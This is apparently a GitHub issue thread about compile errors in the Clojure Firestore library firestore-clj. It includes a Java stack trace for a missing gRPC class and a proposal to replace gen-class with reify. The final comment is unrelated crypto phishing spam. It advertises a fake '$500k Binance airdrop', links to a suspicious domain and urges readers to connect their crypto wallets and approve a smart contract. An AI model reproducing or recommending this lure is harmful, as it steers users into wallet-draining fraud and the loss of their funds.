### ISSUE TITLE
Review google compile dependency

### ISSUE THREAD

**Issue by codestiff** [polvotech/firestore-clj#6]
It looks like one of the necessary steps before using `firestore-clj` is to set `managed-dependencies`. I'm not familiar with what is happening here but suffice it to say, I've been needing to do things like: https://github.com/codestiff/connective/blob/0.1.7/modules/connective-firestore/project.clj#L8

In order to work w/ `firestore-clj`. I think a more complete picture of what is causing compilation issues when not using `managed-dependencies` is worthwhile.

For example,
```
Caused by: java.lang.NoClassDefFoundError: io/grpc/ManagedChannel
        at java.base/java.lang.Class.getDeclaredMethods0(Native Method)
        at java.base/java.lang.Class.privateGetDeclaredMethods(Class.java:3119)
        at java.base/java.lang.Class.privateGetPublicMethods(Class.java:3144)
        at java.base/java.lang.Class.getMethods(Class.java:1863)
        at clojure.lang.Reflector.getMethods(Reflector.java:498)
        at clojure.lang.Compiler$HostExpr$Parser.parse(Compiler.java:994)
        at clojure.lang.Compiler.analyzeSeq(Compiler.java:7107)
        ... 196 more
Caused by: java.lang.ClassNotFoundException: io.grpc.ManagedChannel
        at java.base/jdk.internal.loader.BuiltinClassLoader.loadClass(BuiltinClassLoader.java:582)
        at java.base/jdk.internal.loader.ClassLoaders$AppClassLoader.loadClass(ClassLoaders.java:190)
        at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:499)
        ... 203 more
Subprocess failed
REPL server launch timed out.
```

**Comment by codestiff** [comment]
#### Proposal 1

Perhaps, `gen-class` isn't necessary. Remove the gen-class and allow it to be dynamic.

https://github.com/polvotech/firestore-clj/blob/edb0f8d871138fcbe3ef19cdf8c393fae46b70e4/project.clj#L12

Use `reify` perhaps. Or if there a way to `gen-class` at runtime (reify is probably the better option).

**Comment by codestiff** [comment]
Related: https://github.com/polvotech/firestore-clj/issues/1#issuecomment-630508083

**Comment by lurodrigo** [comment]
Sorry for the delay! I've been really busy in the past few weeks. Gonna take a deeper look soon

**Comment by mohamedata-code** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

### 3. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)


Winners: @abecedarian93, @ienavasr, @eltonchaw7, @researchoor, @dshibanov, @JacekDuszenko, @SIC98, @ShuoruiZhang, @aquaqamelob2, @saturn99
